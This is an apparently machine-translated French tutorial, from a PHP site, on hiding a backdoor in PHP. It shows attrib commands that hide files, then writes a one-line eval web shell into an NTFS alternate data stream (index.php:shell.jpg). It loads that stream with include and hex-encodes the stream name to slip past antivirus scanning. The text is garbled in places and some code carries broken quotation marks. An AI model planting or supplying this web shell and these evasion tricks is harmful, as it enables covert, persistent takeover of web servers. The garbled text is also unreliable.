Maison > Article > développement back-end > Comment masquer la porte dérobée en php ?
Comment masquer la porte dérobée en PHP : créez d'abord un fichier caché système et créez un fichier caché ADS ; puis utilisez jpd en incluant enfin le fichier encodé en hexadécimal [index.php:shell.jpg] .
Comment masquer la porte dérobée en php :
attribut +s +h
Créer des fichiers cachés du système. / attrib +s +a +r +h
Nom du fichierattrib +s +h
2. Utilisez ADS pour masquer les fichiers
Les flux de données alternatifs NTFS (ADS en abrégé) sont une fonctionnalité du format de disque NTFS sous. le système de fichiers, chaque fichier peut avoir plusieurs flux de données. L'interprétation populaire est que d'autres fichiers peuvent être « hébergés » sur un certain fichier, mais dans le gestionnaire de ressources, seul le fichier hôte peut être vu et le fichier hôte est introuvable. Nous pouvons faire beaucoup de choses intéressantes avec les flux de données ADS. (Copié)1. Créez d'abord le fichier caché ADS
Dans la ligne de commande, faites écho à un flux de données dans, par exemple, le le fichier d'index est un document normal.echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpgCela génère un index.php:shell.jpg invisible Vous pouvez le visualiser avec la commande
dir/r
2 Le fichier contient
Nous avons généré index.php:shell. .jpg, peut être utilisé en incluant le fichier.<?php include(‘index.php:shell.jpg‘)?>Partage technique d'images Vous pouvez également utiliser le include.php caché que vous avez appris ci-dessus
3. Évitez de tuer
Ça ne marche pas même si vous le cachez, frère dei, le bouclier D explose instantanément lorsque vous le balayez. Hex encode index.php:shell.jpg<?php $a="696E6465782E7068703A7368656C6C2E6A7067"; // index.php:shell.jpg hex编码 $b="a"; include(PACK(‘H*‘,$$b)) ?>
Recommandations d'apprentissage associées :
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!